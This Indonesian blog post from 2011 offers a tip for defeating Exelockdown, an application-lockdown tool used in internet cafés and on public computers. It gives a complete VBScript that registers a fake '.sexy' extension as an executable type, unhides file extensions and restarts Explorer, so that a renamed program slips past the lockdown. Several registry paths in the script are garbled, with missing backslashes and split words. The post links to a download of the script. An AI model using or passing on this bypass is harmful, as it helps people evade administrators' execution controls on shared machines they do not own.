By Pass Executable Lockdown dengan Registry Shell Spawning

Written By Putra IGP on Tuesday, April 26, 2011 | Tuesday, April 26, 2011

Pada kesempatan kali ini seperti biasa saya sekedar berbagi tips gampang memby pass proteksi program security yaitu Exelockdown.Program ini fungsinya untuk mencegah instalasi program, mencegah program jalan selain program yang terdaftar jadi - cocoknya dipakai di warnet atau game center. Atau gampangannya di kompie umum deh.

Cara membypass program ini selain dengan merekayasa lokasi passwordnya bisa dilakukan dengan cara seperti ini :

Buat ekstensi baru karena program ini tampaknya mengenali file exe dari ekstensinya. Anggap saja di contoh ini saya buat ekstensi baru bernama sexy, rename saja file exe menjadi sexy. Daftarkan ekstensi sexy sehingga diperlakukan sama seperti file exe. Dah intinya cuma gicu.


Aplikasi praktisnya bisa memakai script vbs di bawah ini :
==============================

const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001


QUOT = chr(34)
strComputer = "."

On error resume next

Tanya = MsgBox("By Pass Exelockdown dengan Registry Shell Spawning"& _
vbNewLine & "Reset Exelockdown?", 36,"Exelockdown Hacking - by Lovepassword")



If Tanya = 6 Then 'Bila dipilih YA



Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonat e}!\" &strComputer & " ootdefault:StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy",,"exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy","Content Type","application/x-msdownload"

objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexyPersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexyPersistentHandler",,"{098f 2470-bae0-11cd-b579-08002b30bfeb}"

objRegistry.CreateKey HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER,"SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced","HideFileExt",0

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\" & strComputer & " ootcimv2")
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next

set objShell = createobject("Wscript.Shell")
objShell.Run "explorer.exe"

msgbox "Copi file exe, rename menjadi file sexy, lalu jalankan",vbInformation,"Exelockdown Hacking - by Lovepassword"
End If

=============================






Jalankan script, rename file exe jadi sexy lalu jalankan file sexy tersebut.





SUMBER :

http://lovepassword.blogspot.com/200...k-by-pass.html

SCRIPT BISA DIDOWNLOAD di :

http://www.ziddu.com/download/675931...SIKAT.zip.html
Posted by Putra IGP at Tuesday, April 26, 2011
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)